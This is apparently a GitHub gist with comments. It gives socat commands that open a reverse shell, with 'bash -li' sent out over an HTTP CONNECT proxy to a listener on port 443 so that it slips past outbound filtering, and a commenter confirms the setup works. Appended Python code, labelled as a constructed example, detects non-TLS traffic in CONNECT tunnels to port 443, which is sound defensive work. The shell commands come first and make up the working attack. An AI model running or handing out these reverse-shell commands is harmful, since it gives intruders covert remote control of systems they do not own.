# Listener on x.x.x.x:443:
socat file:`tty`,raw,echo=0 tcp-listen:443
# Reverse shell proxy server is at 10.10.10.1:8222:
socat UNIX-LISTEN:/tmp/x,reuseaddr,fork PROXY:10.10.10.1:x.x.x.x:443,proxyport=8222 &
socat exec:'bash -li',pty,stderr,setsid,sigint,sane unix:"/tmp/x"

@staaldraad staaldraad commented Aug 31, 2018

The proxy server must allow CONNECT proxying

socat man-page entry:

PROXY:<proxy>:<hostname>:<port>
Connects to an HTTP proxy server on port 8080 using TCP/IP version 4 or 6 depending on address specification, name resolution, or option pf, and sends a CONNECT request for hostname:port. If the proxy grants access and succeeds to connect to the target, data transfer between socat and the target can start. Note that the traffic need not be HTTP but can be an arbitrary protocol.
Option groups: FD,SOCKET,IP4,IP6,TCP,HTTP,RETRY
Useful options: proxyport, ignorecr, proxyauth, resolve, crnl, bind, connect-timeout, mss, sourceport, retry
See also: SOCKS, TCP

Could probably do this in a one-liner but I was failing. The two part-er worked a charm 🎉
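
Added example, not part of the gist or of socat: since the man-page entry above notes that a CONNECT tunnel can carry an arbitrary protocol, a proxy or network sensor that sees the first client bytes after CONNECT can flag port-443 tunnels that do not begin with a TLS ClientHello. The function names, the sample byte strings and the address 192.0.2.10 are constructed for illustration.

```python
import struct

TLS_HANDSHAKE = 0x16   # TLS record content type: handshake
CLIENT_HELLO = 0x01    # handshake message type: ClientHello
MAX_RECORD = 16384     # a plaintext TLS record carries at most 2^14 bytes

# Constructed samples: the start of a TLS ClientHello record, and the kind of
# cleartext an interactive shell writes first (a prompt).
SAMPLE_TLS = b"\x16\x03\x01\x02\x00\x01\x00\x01\xfc\x03\x03"
SAMPLE_SHELL = b"user@host:~$ "


def looks_like_tls_client_hello(first_bytes: bytes) -> bool:
    """Return True if the first client bytes of a tunnel start a TLS ClientHello."""
    if len(first_bytes) < 6:
        return False
    # Record header: content type (1), version major/minor (1+1), length (2).
    content_type, major, minor, record_len = struct.unpack("!BBBH", first_bytes[:5])
    if content_type != TLS_HANDSHAKE:
        return False
    # Record-layer version has major 3; minor values 0 through 4 are accepted.
    if major != 3 or minor > 4:
        return False
    if record_len == 0 or record_len > MAX_RECORD:
        return False
    # First byte of the record payload is the handshake message type.
    return first_bytes[5] == CLIENT_HELLO


def classify_tunnel(connect_target: str, first_bytes: bytes) -> str:
    """Classify a CONNECT tunnel from its target (host:port) and first client bytes."""
    _host, _, port = connect_target.rpartition(":")
    if port == "443" and not looks_like_tls_client_hello(first_bytes):
        return "alert: non-TLS payload in CONNECT tunnel to port 443"
    return "ok"


if __name__ == "__main__":
    for label, data in (("tls", SAMPLE_TLS), ("shell", SAMPLE_SHELL)):
        print(label, "->", classify_tunnel("192.0.2.10:443", data))
```

The check only inspects the start of the stream, so treat it as one signal alongside restricting which destinations the proxy will accept CONNECT requests for.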
